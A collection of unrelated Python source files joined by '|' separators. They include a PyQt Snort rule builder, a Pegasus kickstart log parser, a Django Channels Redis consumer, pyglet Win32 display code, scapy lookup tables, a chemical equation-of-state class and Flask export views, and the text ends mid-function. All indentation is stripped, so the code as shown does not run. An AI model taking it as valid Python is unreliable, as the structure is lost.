if ICMP in pkt:
self.ui.protoCombo.setCurrentText("icmp")
for combo in self.comboBoxes:
combo.setCurrentIndex(0)
self.buildRule()
self.textSlider.setValue(0)
def openPCAP(self):
filename = QtWidgets.QFileDialog.getOpenFileName(self, 'Open PCAP',filter='Packet Captures (*.cap *.pcap)')
if filename:
self.file = filename[0]
self.packets = rdpcap(self.file)
self.findStreams()
self.ui.packetBox.setRange(1, len(self.packets))
self.readPacket()
def contentChanged(self):
content = self.ui.contentEdit.text()
hexContent = self.ui.hexColumn.toPlainText().replace("\n", "")
textContent = self.ui.textColumn.toPlainText().replace("\n", "")
if self.ui.nocaseCheck.isChecked():
content = content.lower()
textContent = textContent.lower()
cursor = QtGui.QTextCursor(self.ui.hexColumn.document())
cursor.setPosition(0, QtGui.QTextCursor.MoveAnchor)
cursor.setPosition(self.ui.hexColumn.document().characterCount() - 1, QtGui.QTextCursor.KeepAnchor)
cursor.setCharFormat(self.defaultFmt)
cursor2 = QtGui.QTextCursor(self.ui.textColumn.document())
cursor2.setPosition(0, QtGui.QTextCursor.MoveAnchor)
cursor2.setPosition(self.ui.textColumn.document().characterCount() - 1, QtGui.QTextCursor.KeepAnchor)
cursor2.setCharFormat(self.defaultFmt)
matchPointer = 0
endPointer = 0
start = 0
end = 0
match = False
origContent = content
while content:
if content.startswith("|"):
if content.count("|") > 1:
content = content[1:]
index = content.index("|")
search = content[0:index]
content = content[index + 1:]
else:
search = content[1:]
content = None
if search and \
(not match and search in hexContent[endPointer:]) or \
(match and hexContent[endPointer:endPointer + len(search)] == search):
if not match:
end = hexContent[endPointer:].index(search) + len(search) + endPointer
start = hexContent[endPointer:].index(search) + endPointer
match = True
matchPointer = end
else:
end = end + len(search)
endPointer = end
elif match:
content = origContent
match = False
start = 0
end = 0
endPointer = matchPointer
matchPointer = 0
else:
break
else:
if "|" in content:
search = content[0:content.index("|")]
content = content[content.index("|"):]
else:
search = content
content = None
textPointer = int(math.ceil(endPointer / 3.0))
if search and \
(not match and search in textContent[textPointer:]) or \
(match and textContent[textPointer:len(search) + textPointer] == search):
if not match:
end = ((textContent[textPointer:].index(search) + len(search)) * 3) + endPointer
start = (textContent[textPointer:].index(search) * 3) + endPointer
match = True
matchPointer = end
else:
end = end + (len(search) * 3) + 1
endPointer = end
elif match:
content = origContent
match = False
start = 0
end = 0
endPointer = matchPointer
matchPointer = 0
else:
break
if match:
start = start + (start / 47)
end = end + (end / 47)
fmt = QtGui.QTextCharFormat()
fmt.setForeground(QtCore.Qt.red)
cursor.setPosition(start, QtGui.QTextCursor.MoveAnchor)
cursor.setPosition(end, QtGui.QTextCursor.KeepAnchor)
cursor.setCharFormat(fmt)
cursor2.setPosition(start / 3, QtGui.QTextCursor.MoveAnchor)
cursor2.setPosition(math.ceil(end / 3.0), QtGui.QTextCursor.KeepAnchor)
cursor2.setCharFormat(fmt)
self.ui.depthEdit.setText(str(int(math.ceil(end / 3.0))))
self.ui.offsetEdit.setText(str(start / 3))
def clearAll(self):
for combo in self.comboBoxes:
combo.clear()
combo.addItem("any")
self.ui.destPortCombo.addItem("any")
self.ui.hexColumn.clear()
self.ui.textColumn.clear()
self.ui.ruleText.clear()
self.ui.contentEdit.clear()
self.ui.flowCheck.setChecked(False)
self.ui.flowCombo.setCurrentText("established")
self.ui.flowCombo.setEnabled(False)
self.ui.streamButton.setEnabled(False)
self.ui.depthCheck.setChecked(False)
self.ui.depthEdit.clear()
self.ui.depthEdit.setEnabled(False)
self.ui.offsetCheck.setChecked(False)
self.ui.offsetEdit.clear()
self.ui.offsetEdit.setEnabled(False)
self.ui.distanceCheck.setChecked(False)
self.ui.distanceEdit.clear()
self.ui.distanceEdit.setEnabled(False)
self.ui.withinCheck.setChecked(False)
self.ui.withinEdit.clear()
self.ui.withinEdit.setEnabled(False)
self.ui.nocaseCheck.setChecked(False)
def flowChecked(self):
self.ui.flowCombo.setEnabled(self.ui.flowCheck.isChecked())
self.buildRule()
def buildRule(self):
self.ui.ruleText.clear()
options = ""
if self.ui.flowCheck.isChecked():
options += "flow: %s;" % (self.ui.flowCombo.currentText(), )
rule = "%s %s %s %s %s %s %s {%s}" % (
self.ui.actionCombo.currentText(),
self.ui.protoCombo.currentText(),
self.ui.srcCombo.currentText(),
self.ui.srcPortCombo.currentText(),
self.ui.dirCombo.currentText(),
self.ui.destCombo.currentText(),
self.ui.destPortCombo.currentText(),
options)
self.ui.ruleText.appendPlainText(rule)
def main():
app = QtWidgets.QApplication(sys.argv)
snort = Snort()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
"""
Pegasus utility functions for pasing a kickstart output file and return wanted information
"""
from xml.parsers import expat
import re
import sys
import logging
import traceback
import os
re_parse_props = re.compile(r'(\S+)\s*=\s*([^",]+)')
re_parse_quoted_props = re.compile(r'(\S+)\s*=\s*"([^"]+)"')
logger = logging.getLogger(__name__)
class Parser:
"""
This class is used to parse a kickstart output file, and return
requested information.
"""
def __init__(self, filename):
"""
This function initializes the Parser class with the kickstart
output file that should be parsed.
"""
self._kickstart_output_file = filename
self._parsing_job_element = False
self._parsing_arguments = False
self._parsing_main_job = False
self._parsing_machine = False
self._parsing_stdout = False
self._parsing_stderr = False
self._parsing_data = False
self._parsing_cwd = False
self._parsing_final_statcall = False
self._record_number = 0
self._arguments = []
self._stdout = ""
self._stderr = ""
self._cwd = ""
self._lfn = "" # filename parsed from statcall record
self._keys = {}
self._ks_elements = {}
self._fh = None
self._open_error = False
def open(self):
"""
This function opens a kickstart output file.
"""
try:
self._fh = open(self._kickstart_output_file)
except:
# Error opening file
self._fh = None
self._open_error = True
return False
# Open succeeded
self._open_error = False
return True
def close(self):
"""
This function closes the kickstart output file.
"""
try:
self._fh.close()
except:
return False
return True
def read_record(self):
"""
This function reads an invocation record from the kickstart
output file. We also look for the struct at the end of a file
containing multiple records. It returns a string containing
the record, or None if it is not found.
"""
buffer = ""
#valid token that is parsed
token = ""
self._record_number += 1
logger.debug( "Started reading record number %d from kickstart file %s" %( self._record_number, self._kickstart_output_file))
# First, we find the beginning <invocation xmlns....
while True:
line = self._fh.readline()
if line == '':
# End of file, record not found
return None
if line.find("<invocation") != -1:
token = "<invocation"
break
if ( line.find("[cluster-task") != -1 ):
token = "[cluster-task"
break
if ( line.find("[cluster-summary") != -1 ):
token = "[cluster-summary"
break
if ( line.find("[seqexec-task") != -1 ):
#deprecated token
token = "[seqexec-task"
break
if ( line.find("[seqexec-summary") != -1 ):
#deprecated token
token = "[seqexec-summary"
break
# Found something!
#if line.find("<invocation") >= 0:
if token == "<invocation" :
# Found invocation record
start = line.find("<invocation")
buffer = line[start:]
end = buffer.find("</invocation>")
# Check if we have everything in a single line
if end >= 0:
end = end + len("</invocation>")
return buffer[:end]
#elif line.find("[seqexec-summary") >= 0:
elif ( token == "[cluster-summary" or token == "[seqexec-summary" ):
# Found line with cluster jobs summary
start = line.find(token)
buffer = line[start:]
end = buffer.find("]")
if end >= 0:
end = end + len("]")
return buffer[:end]
# clustered record should be in a single line!
logger.warning("%s: %s line is malformed... ignoring it..." % (self._kickstart_output_file, token ))
return ""
#elif line.find("[seqexec-task") >= 0:
elif ( token == "[cluster-task" or token == "[seqexec-task" ):
# Found line with task information
start = line.find( token )
buffer = line[start:]
end = buffer.find("]")
if end >= 0:
end = end + len("]")
return buffer[:end]
# task record should be in a single line!
logger.warning("%s: %s line is malformed... ignoring it..." % (self._kickstart_output_file, token))
return ""
else:
return ""
# Ok, now continue reading the file until we get a full record
buffer = [buffer]
while True:
line = self._fh.readline()
if line == '':
# End of file, record not found
return None
#buffer = buffer + line
buffer.append( line )
if line.find("</invocation>") >= 0:
break
# Now, we got it, let's make sure
end = line.find("</invocation>")
if end == -1:
return ""
#end = end + len("</invocation>")
invocation = "".join(buffer)
#print invocation
logger.debug( "Finished reading record number %d from kickstart file %s" %( self._record_number, self._kickstart_output_file))
return invocation
#return buffer[:end]
def is_invocation_record(self, buffer=''):
"""
Returns True if buffer contains an invocation record.
"""
if buffer.find("<invocation") == -1:
return False
return True
def is_task_record(self, buffer=''):
"""
Returns True if buffer contains a task record.
"""
if ( buffer.find("[seqexec-task") != -1 or buffer.find( "[cluster-task" ) != -1 ):
return True
return False
def is_clustered_record(self, buffer=''):
"""
Returns True if buffer contains a clustered record.
"""
if ( buffer.find("[seqexec-summary") != -1 or buffer.find( "[cluster-summary" ) != -1):
return True
return False
def start_element(self, name, attrs):
"""
Function called by the parser every time a new element starts
"""
# Keep track if we are parsing the main job element
if name == "mainjob":
self._parsing_main_job = True
if name == "machine":
self._parsing_machine = True
# Keep track if we are inside one of the job elements
if (name == "setup" or name == "prejob" or
name == "mainjob" or name == "postjob" or name == "cleanup"):
self._parsing_job_element = True
if name == "argument-vector" and name in self._ks_elements:
# Start parsing arguments
self._parsing_arguments = True
elif name == "cwd" and name in self._ks_elements:
# Start parsing cwd
self._parsing_cwd = True
elif name == "data":
# Start parsing data for stdout and stderr output
self._parsing_data = True
elif name == "file" and name in self._ks_elements:
if self._parsing_main_job == True :
# Special case for name inside the mainjob element (will change this later)
for my_element in self._ks_elements[name]:
if my_element in attrs:
self._keys[my_element] = attrs[my_element]
elif name == "ram" and name in self._ks_elements:
if self._parsing_machine == True:
# Special case for ram inside the machine element (will change this later)
for my_element in self._ks_elements[name]:
if my_element in attrs:
self._keys[my_element] = attrs[my_element]
elif name == "uname" and name in self._ks_elements:
if self._parsing_machine == True:
# Special case for uname inside the machine element (will change this later)
for my_element in self._ks_elements[name]:
if my_element in attrs:
self._keys[my_element] = attrs[my_element]
elif name == "statcall":
if "id" in attrs:
if attrs["id"] == "stdout" and "stdout" in self._ks_elements:
self._parsing_stdout = True
elif attrs["id"] == "stderr" and "stderr" in self._ks_elements:
self._parsing_stderr = True
elif attrs["id"] == "final" :
self._parsing_final_statcall = True
self._lfn = attrs["lfn"]
elif name == "statinfo":
if self._parsing_final_statcall is True:
statinfo = {}
for my_element in self._ks_elements[name]:
if my_element in attrs:
statinfo[my_element] = attrs[my_element]
if not self._keys.has_key( "outputs"):
self._keys[ "outputs" ] = {} #a dictionary indexed by lfn
lfn = self._lfn
if lfn is None or not statinfo:
logger.warning( "Malformed/Empty stat record for output lfn %s %s" %(lfn, statinfo))
self._keys["outputs"][lfn] = statinfo
elif name == "usage" and name in self._ks_elements:
if self._parsing_job_element:
# Special case for handling utime and stime, which need to be added
for my_element in self._ks_elements[name]:
if my_element in attrs:
if my_element in self._keys:
try:
self._keys[my_element] = self._keys[my_element] + float(attrs[my_element])
except ValueError:
logger.warning("cannot convert element %s to float!" % (my_element))
else:
try:
self._keys[my_element] = float(attrs[my_element])
except ValueError:
logger.warning("cannot convert element %s to float!" % (my_element))
else:
# For all other elements, check if we want them
if name in self._ks_elements:
for my_element in self._ks_elements[name]:
if my_element in attrs:
self._keys[my_element] = attrs[my_element]
def end_element(self, name):
"""
Function called by the parser whenever we reach the end of an element
"""
# Stop parsing argement-vector and cwd if we reached the end of those elements
if name == "argument-vector":
self._parsing_arguments = False
elif name == "cwd":
self._parsing_cwd = False
elif name == "mainjob":
self._parsing_main_job = False
elif name == "machine":
self._parsing_machine = False
elif name == "statcall":
if self._parsing_stdout == True:
self._parsing_stdout = False
if self._parsing_stderr == True:
self._parsing_stderr = False
if self._parsing_final_statcall == True:
self._parsing_final_statcall = False
elif name == "data":
self._parsing_data = False
# Now, see if we left one of the job elements
if (name == "setup" or name == "prejob" or
name == "mainjob" or name == "postjob" or name == "cleanup"):
self._parsing_job_element = False
def char_data(self, data=''):
"""
Function called by the parser whenever there's character data in an element
"""
if self._parsing_cwd == True:
self._cwd += data
if self._parsing_arguments == True:
self._arguments.append(data.strip())
if self._parsing_stdout == True and self._parsing_data == True:
self._stdout += data
if self._parsing_stderr == True and self._parsing_data == True:
self._stderr += data
def parse_invocation_record(self, buffer=''):
"""
Parses the xml record in buffer, returning the desired keys.
"""
# Initialize variables
self._parsing_arguments = False
self._parsing_main_job = False
self._parsing_machine = False
self._parsing_stdout = False
self._parsing_stderr = False
self._parsing_data = False
self._parsing_cwd = False
self._arguments = []
self._stdout = ""
self._stderr = ""
self._cwd = ""
self._keys = {}
# Check if we have an invocation record
if self.is_invocation_record(buffer) == False:
return self._keys
# Add invocation key to our response
self._keys["invocation"] = True
# Prepend XML header
buffer = '<?xml version="1.0" encoding="ISO-8859-1"?>\n' + buffer
# Create parser
self._my_parser = expat.ParserCreate()
self._my_parser.StartElementHandler = self.start_element
self._my_parser.EndElementHandler = self.end_element
self._my_parser.CharacterDataHandler = self.char_data
# Parse everything!
output = self._my_parser.Parse(buffer)
# Add cwd, arguments, stdout, and stderr to keys
if "cwd" in self._ks_elements:
self._keys["cwd"] = self._cwd
if "argument-vector" in self._ks_elements:
self._keys["argument-vector"] = " ".join(self._arguments)
if "stdout" in self._ks_elements:
self._keys["stdout"] = self._stdout
if "stderr" in self._ks_elements:
self._keys["stderr"] = self._stderr
return self._keys
def parse_clustered_record(self, buffer=''):
"""
Parses the clustered record in buffer, returning all found keys
"""
self._keys = {}
# Check if we have an invocation record
if self.is_clustered_record(buffer) == False:
return self._keys
# Add clustered key to our response
self._keys["clustered"] = True
# Parse all quoted properties
for my_key, my_val in re_parse_quoted_props.findall(buffer):
self._keys[my_key] = my_val
# And add unquoted properties as well
for my_key, my_val in re_parse_props.findall(buffer):
self._keys[my_key] = my_val
return self._keys
def parse_task_record(self, buffer=''):
"""
Parses the task record in buffer, returning all found keys
"""
self._keys = {}
# Check if we have an invocation record
if self.is_task_record(buffer) == False:
return self._keys
# Add task key to our response
self._keys["task"] = True
# Parse all quoted properties
for my_key, my_val in re_parse_quoted_props.findall(buffer):
self._keys[my_key] = my_val
# And add unquoted properties as well
for my_key, my_val in re_parse_props.findall(buffer):
self._keys[my_key] = my_val
return self._keys
def parse(self, keys_dict, tasks=True, clustered=True):
"""
This function parses the kickstart output file, looking for
the keys specified in the keys_dict variable. It returns a
list of dictionaries containing the found keys. Look at the
parse_stampede function for details about how to pass keys
using the keys_dict structure. The function will return an
empty list if no records are found or if an error happens.
"""
my_reply = []
# Place keys_dict in the _ks_elements
self._ks_elements = keys_dict
# Try to open the file
if self.open() == False:
return my_reply
logger.debug( "Started reading records from kickstart file %s" %(self._kickstart_output_file))
self._record_number = 0
# Read first record
my_buffer = self.read_record()
# Loop while we still have record to read
while my_buffer is not None:
if self.is_invocation_record(my_buffer) == True:
# We have an invocation record, parse it!
try:
my_record = self.parse_invocation_record(my_buffer)
except:
logger.warning("KICKSTART-PARSE-ERROR --> error parsing invocation record in file %s"
% (self._kickstart_output_file))
logger.warning(traceback.format_exc())
# Found error parsing this file, return empty reply
my_reply = []
# Finish the loop
break
my_reply.append(my_record)
elif self.is_clustered_record(my_buffer) == True:
# Check if we want clustered records too
if clustered:
# Clustered records are seqexec summary records for clustered jobs
# We have a clustered record, parse it!
my_reply.append(self.parse_clustered_record(my_buffer))
elif self.is_task_record(my_buffer) == True:
# Check if we want task records too
if tasks:
# We have a clustered record, parse it!
my_reply.append(self.parse_task_record(my_buffer))
else:
# We have something else, this shouldn't happen!
# Just skip it
pass
# Read next record
my_buffer = self.read_record()
# Lastly, close the file
self.close()
return my_reply
def parse_stampede(self):
"""
This function works similarly to the parse function above,
but does not require a keys_dict parameter as it uses a
built-in list of keys speficically used in the Stampede
schema.
"""
stampede_elements = {"invocation": ["hostname", "resource", "user", "hostaddr", "transformation", "derivation"],
"mainjob": ["duration", "start"],
"usage": ["utime", "stime"],
"ram": ["total"],
"uname": ["system", "release", "machine"],
"file": ["name"],
"status": ["raw"],
"regular": ["exitcode"],
"argument-vector": [],
"cwd": [],
"stdout": [],
"stderr": [],
"statinfo": ["lfn", "size", "ctime", "user" ]}
return self.parse(stampede_elements, tasks=True, clustered=True)
def parse_stdout_stderr(self):
"""
This function extracts the stdout and stderr from a kickstart output file.
It returns an array containing the output for each task in a job.
"""
stdout_stderr_elements = {"invocation": ["hostname", "resource", "derivation", "transformation"],
"file": ["name"],
"regular": ["exitcode"],
"failure": ["error"],
"argument-vector": [],
"cwd": [],
"stdout": [],
"stderr": []}
return self.parse(stdout_stderr_elements, tasks=False, clustered=False)
if __name__ == "__main__":
# Let's run a test!
print "Testing kickstart output file parsing..."
# Make sure we have an argument
if len(sys.argv) < 2:
print "For testing, please give a kickstart output filename!"
sys.exit(1)
# Create parser class
p = Parser(sys.argv[1])
# Parse file according to the Stampede schema
output = p.parse_stampede()
# Print output
for record in output:
print record
|
import sys,os
from PyQt5 import QtCore, QtGui, QtWidgets, uic
from model import MainModel
from view import MainView
class App(QtWidgets.QApplication):
def __init__(self, scriptpath, sys_argv):
super(App, self).__init__(sys_argv)
self.model = MainModel()
self.main_view = MainView(self.model, scriptpath)
self.main_view.show() #Maximized()
self.model.gridChanged.emit()
if __name__ == '__main__':
scriptpath = os.path.dirname(os.path.abspath(sys.argv[0]))
app = App(scriptpath, sys.argv)
sys.exit(app.exec_())
|
from channels.auth import channel_session_user_from_http
from .models import Stream, Notification
import redis
import ast
from .task import sendNotifications, send_notifications
from channels import Group
import json
redis_con = redis.Redis('demo.scorebeyond.com', 8007)
subs = redis_con.pubsub()
subs.subscribe('test')
@channel_session_user_from_http
def ws_connect(message):
'''Capture redis stream and save it into database'''
Group('stream').add(message.reply_channel)
for message in subs.listen():
if message['type'] == "message":
data1 = ast.literal_eval(message['data'])
print data1['name']
if Notification.objects.filter(event_name=data1['name']):
notif = Notification.objects.get(event_name=data1['name'])
if notif.no_delay:
send_notifications(data1)
else:
sendNotifications(data1, capture=notif.delay)
if not Stream.objects.filter(name=data1['name']):
type_list = []
if not data1['info']:
Stream.objects.create(name=data1['name'], info="")
else:
for k, v in data1['info'].iteritems():
type_list.append(k+":"+type(v).__name__)
Stream.objects.create(name=data1['name'], info=','.join(type_list))
Group('stream').send({
'text': json.dumps({
'event_name': data1['name'],
'blueprint': ','.join(type_list),
})
})
else:
print message
|
"""effcalculator URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url, include
from django.contrib.auth import views as auth_views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include('api.urls')),
url(r'^', include('frontend.urls'))
]
|
from base import Display, Screen, ScreenMode, Canvas
from pyglet.libs.win32 import _kernel32, _user32, types, constants
from pyglet.libs.win32.constants import *
from pyglet.libs.win32.types import *
class Win32Display(Display):
def get_screens(self):
screens = []
def enum_proc(hMonitor, hdcMonitor, lprcMonitor, dwData):
r = lprcMonitor.contents
width = r.right - r.left
height = r.bottom - r.top
screens.append(
Win32Screen(self, hMonitor, r.left, r.top, width, height))
return True
enum_proc_type = WINFUNCTYPE(BOOL, HMONITOR, HDC, POINTER(RECT), LPARAM)
enum_proc_ptr = enum_proc_type(enum_proc)
_user32.EnumDisplayMonitors(NULL, NULL, enum_proc_ptr, 0)
return screens
class Win32Screen(Screen):
_initial_mode = None
def __init__(self, display, handle, x, y, width, height):
super(Win32Screen, self).__init__(display, x, y, width, height)
self._handle = handle
def get_matching_configs(self, template):
canvas = Win32Canvas(self.display, 0, _user32.GetDC(0))
configs = template.match(canvas)
# XXX deprecate config's being screen-specific
for config in configs:
config.screen = self
return configs
def get_device_name(self):
info = MONITORINFOEX()
info.cbSize = sizeof(MONITORINFOEX)
_user32.GetMonitorInfoW(self._handle, byref(info))
return info.szDevice
def get_modes(self):
device_name = self.get_device_name()
i = 0
modes = []
while True:
mode = DEVMODE()
mode.dmSize = sizeof(DEVMODE)
r = _user32.EnumDisplaySettingsW(device_name, i, byref(mode))
if not r:
break
modes.append(Win32ScreenMode(self, mode))
i += 1
return modes
def get_mode(self):
mode = DEVMODE()
mode.dmSize = sizeof(DEVMODE)
_user32.EnumDisplaySettingsW(self.get_device_name(),
ENUM_CURRENT_SETTINGS,
byref(mode))
return Win32ScreenMode(self, mode)
def set_mode(self, mode):
assert mode.screen is self
if not self._initial_mode:
self._initial_mode = self.get_mode()
r = _user32.ChangeDisplaySettingsExW(self.get_device_name(),
byref(mode._mode),
None,
CDS_FULLSCREEN,
None)
if r == DISP_CHANGE_SUCCESSFUL:
self.width = mode.width
self.height = mode.height
def restore_mode(self):
if self._initial_mode:
self.set_mode(self._initial_mode)
class Win32ScreenMode(ScreenMode):
def __init__(self, screen, mode):
super(Win32ScreenMode, self).__init__(screen)
self._mode = mode
self.width = mode.dmPelsWidth
self.height = mode.dmPelsHeight
self.depth = mode.dmBitsPerPel
self.rate = mode.dmDisplayFrequency
class Win32Canvas(Canvas):
def __init__(self, display, hwnd, hdc):
super(Win32Canvas, self).__init__(display)
self.hwnd = hwnd
self.hdc = hdc
|
import re
from dadict import DADict
from error import log_loading
ETHER_ANY = "\x00"*6
ETHER_BROADCAST = "\xff"*6
ETH_P_ALL = 3
ETH_P_IP = 0x800
ETH_P_ARP = 0x806
ETH_P_IPV6 = 0x86dd
ARPHDR_ETHER = 1
ARPHDR_METRICOM = 23
ARPHDR_PPP = 512
ARPHDR_LOOPBACK = 772
ARPHDR_TUN = 65534
IPV6_ADDR_UNICAST = 0x01
IPV6_ADDR_MULTICAST = 0x02
IPV6_ADDR_CAST_MASK = 0x0F
IPV6_ADDR_LOOPBACK = 0x10
IPV6_ADDR_GLOBAL = 0x00
IPV6_ADDR_LINKLOCAL = 0x20
IPV6_ADDR_SITELOCAL = 0x40 # deprecated since Sept. 2004 by RFC 3879
IPV6_ADDR_SCOPE_MASK = 0xF0
IPV6_ADDR_6TO4 = 0x0100 # Added to have more specific info (should be 0x0101 ?)
IPV6_ADDR_UNSPECIFIED = 0x10000
MTU = 1600
def load_protocols(filename):
spaces = re.compile("[ \t]+|\n")
dct = DADict(_name=filename)
try:
for l in open(filename):
try:
shrp = l.find("#")
if shrp >= 0:
l = l[:shrp]
l = l.strip()
if not l:
continue
lt = tuple(re.split(spaces, l))
if len(lt) < 2 or not lt[0]:
continue
dct[lt[0]] = int(lt[1])
except Exception,e:
log_loading.info("Couldn't parse file [%s]: line [%r] (%s)" % (filename,l,e))
except IOError:
log_loading.info("Can't open /etc/protocols file")
return dct
IP_PROTOS=load_protocols("/etc/protocols")
def load_ethertypes(filename):
spaces = re.compile("[ \t]+|\n")
dct = DADict(_name=filename)
try:
f=open(filename)
for l in f:
try:
shrp = l.find("#")
if shrp >= 0:
l = l[:shrp]
l = l.strip()
if not l:
continue
lt = tuple(re.split(spaces, l))
if len(lt) < 2 or not lt[0]:
continue
dct[lt[0]] = int(lt[1], 16)
except Exception,e:
log_loading.info("Couldn't parse file [%s]: line [%r] (%s)" % (filename,l,e))
f.close()
except IOError,msg:
pass
return dct
ETHER_TYPES=load_ethertypes("/etc/ethertypes")
def load_services(filename):
spaces = re.compile("[ \t]+|\n")
tdct=DADict(_name="%s-tcp"%filename)
udct=DADict(_name="%s-udp"%filename)
try:
f=open(filename)
for l in f:
try:
shrp = l.find("#")
if shrp >= 0:
l = l[:shrp]
l = l.strip()
if not l:
continue
lt = tuple(re.split(spaces, l))
if len(lt) < 2 or not lt[0]:
continue
if lt[1].endswith("/tcp"):
tdct[lt[0]] = int(lt[1].split('/')[0])
elif lt[1].endswith("/udp"):
udct[lt[0]] = int(lt[1].split('/')[0])
except Exception,e:
log_loading.warning("Couldn't file [%s]: line [%r] (%s)" % (filename,l,e))
f.close()
except IOError:
log_loading.info("Can't open /etc/services file")
return tdct,udct
TCP_SERVICES,UDP_SERVICES=load_services("/etc/services")
class ManufDA(DADict):
def fixname(self, val):
return val
def _get_manuf_couple(self, mac):
oui = ":".join(mac.split(":")[:3]).upper()
return self.__dict__.get(oui,(mac,mac))
def _get_manuf(self, mac):
return self._get_manuf_couple(mac)[1]
def _get_short_manuf(self, mac):
return self._get_manuf_couple(mac)[0]
def _resolve_MAC(self, mac):
oui = ":".join(mac.split(":")[:3]).upper()
if oui in self:
return ":".join([self[oui][0]]+ mac.split(":")[3:])
return mac
def load_manuf(filename):
try:
manufdb=ManufDA(_name=filename)
for l in open(filename):
try:
l = l.strip()
if not l or l.startswith("#"):
continue
oui,shrt=l.split()[:2]
i = l.find("#")
if i < 0:
lng=shrt
else:
lng = l[i+2:]
manufdb[oui] = shrt,lng
except Exception,e:
log_loading.warning("Couldn't parse one line from [%s] [%r] (%s)" % (filename, l, e))
except IOError:
#log_loading.warning("Couldn't open [%s] file" % filename)
pass
return manufdb
class KnowledgeBase:
def __init__(self, filename):
self.filename = filename
self.base = None
def lazy_init(self):
self.base = ""
def reload(self, filename = None):
if filename is not None:
self.filename = filename
oldbase = self.base
self.base = None
self.lazy_init()
if self.base is None:
self.base = oldbase
def get_base(self):
if self.base is None:
self.lazy_init()
return self.base
|
r"""Pychemqt, Chemical Engineering Process simulator
Copyright (C) 2009-2017, Juan José Gómez Romera <jjgomera@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>."""
from math import exp
from scipy.constants import R
from lib.EoS.Cubic.RK import RK
class RKTwu(RK):
r"""Equation of state of Redlich-Kwong with a modified alpha temperature
dependence by Twu, (1995) [1]_.
.. math::
\begin{array}[t]{l}
P = \frac{RT}{V-b}-\frac{a}{V\left(V+b\right)}\\
a = 0.427480263354\frac{R^2T_c^2}{P_c}\alpha\\
b = 0.086640349965\frac{RT_c}{P_c}\\
\alpha = alpha^{(0)} + \omega\left(\alpha^{(1)}-\alpha^{(0)}\right)\\
\alpha^{(0)} = T_r^{-0.201158} \exp{0.141599\left(1-T_r^{2.29528}
\right)}\\
\alpha^{(1)} = T_r^{-0.660145} \exp{0.500315\left(1-T_r^{2.63165}
\right)}\\
\end{array}
"""
__title__ = "Twu-Redlich-Kwong (1995)"
__status__ = "RKTwu"
__doi__ = {
"autor": "Twu, C.H., Coon, J.E., Cunningham, J.R.",
"title": "A New Generalized Alpha Function for a Cubic Equation of "
"State Part 2. Redlich-Kwong equation",
"ref": "Fluid Phase Equilibria 105 (1995) 61-69",
"doi": "10.1016/0378-3812(94)02602-w"},
def _lib(self, cmp, T):
"""Modified parameteres correlations"""
a = 0.42748023354*R**2*cmp.Tc**2/cmp.Pc
alfa = self._alpha(cmp, T)
b = 0.086640349965*R*cmp.Tc/cmp.Pc
return a*alfa, b
def _alpha(self, cmp, T):
"""Modified α expression"""
Tr = T/cmp.Tc
if Tr <= 1:
alpha0 = Tr**(-0.201158)*exp(0.141599*(1-Tr**2.29528)) # Eq 17
alpha1 = Tr**(-0.660145)*exp(0.500315*(1-Tr**2.63165)) # Eq 18
else:
alpha0 = Tr**(-1.10)*exp(0.441411*(1-Tr**(-1.30))) # Eq 19
alpha1 = Tr**(-2.31278)*exp(0.03258*(1-Tr**(-10.3128))) # Eq 20
# Eq 15
alpha = alpha0 + cmp.f_acent*(alpha1-alpha0)
return alpha
if __name__ == "__main__":
from lib.mezcla import Mezcla
mix = Mezcla(5, ids=[4], caudalMolar=1, fraccionMolar=[1])
eq = RKTwu(300, 9.9742e5, mix)
print('%0.0f %0.1f' % (eq.Vg.ccmol, eq.Vl.ccmol))
eq = RKTwu(300, 42.477e5, mix)
print('%0.1f' % (eq.Vl.ccmol))
|
from flask import Blueprint
from flask import flash
from flask import make_response, render_template
from flask_login import current_user
from markupsafe import Markup
from app.helpers.data_getter import DataGetter
from app.helpers.auth import AuthManager
from app.helpers.exporters.ical import ICalExporter
from app.helpers.exporters.pentabarfxml import PentabarfExporter
from app.helpers.exporters.xcal import XCalExporter
from app.helpers.permission_decorators import can_access
event_export = Blueprint('event_export', __name__, url_prefix='/events/<int:event_id>/export')
@event_export.route('/')
@can_access
def display_export_view(event_id):
event = DataGetter.get_event(event_id)
export_jobs = DataGetter.get_export_jobs(event_id)
user = current_user
if not AuthManager.is_verified_user():
flash(Markup("Your account is unverified. "
"Please verify by clicking on the confirmation link that has been emailed to you."
'<br>Did not get the email? Please <a href="/resend_email/" class="alert-link"> '
'click here to resend the confirmation.</a>'))
return render_template(
'gentelella/admin/event/export/export.html', event=event, export_jobs=export_jobs,
current_user=user
)
@event_export.route('/pentabarf.xml')
@can_access
def pentabarf_export_view(event_id):
response = make_response(PentabarfExporter.export(event_id))
response.headers["Content-Type"] = "application/xml"
response.headers["Content-Disposition"] = "attachment; filename=pentabarf.xml"
return response
@event_export.route('/calendar.ical')
@can_access
def ical_export_view(event_id):
response = make_response(ICalExporter.export(event_id))
response.headers["Content-Type"] = "text/calendar"
response.headers["Content-Disposition"] = "attachment; filename=calendar.ics"
return response
@event_export.route('/calendar.xcs')
@can_access
def xcal_export_view(event_id):
response = make_response(XCalExporter.export(event_id))
response.headers["Content-Type"] = "text/calendar"
response.headers["Content-Disposition"] = "attachment; filename=calendar.xcs"
return response
|
__author__ = 'Mayur M'
import ImgIO
def add(image1, image2): # add two images together
if image1.width == image2.width and image1.height == image2.height:
return_red = []
return_green = []
return_blue = []
for i in range(0, len(image1.red)):
tmp_r = image1.red[i] + image2.red[i] # adding the RGB values
tmp_g = image1.green[i] + image2.green[i]
tmp_b = image1.blue[i] + image2.blue[i]
